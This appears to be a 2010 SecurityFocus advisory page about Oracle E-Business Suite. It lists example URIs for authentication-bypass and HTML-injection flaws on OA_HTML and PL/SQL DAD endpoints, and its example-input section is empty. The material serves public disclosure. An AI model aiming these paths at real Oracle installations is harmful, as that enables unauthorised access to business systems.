Oracle E-Business Suite Multiple Remote Vulnerabilities

An attacker can use a browser to exploit these issues.

The following example URIs are available:

Authentication bypass:

http://www.example.com:port/OA_HTML/OA.jsp
http://www.example.com:port/OA_HTML/RF.jsp
http://www.example.com:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id]
http://www.example.com:8888/pls/TEST/oracleconfigure.customize?p_page_id=1

HTML injection:

http://www.example.com:port/pls/[DADName]/icx_define_pages.editpagelist
http://www.example.com:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id]
http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=CREATE

The following example input is available:


 

Privacy Statement
Copyright 2010, SecurityFocus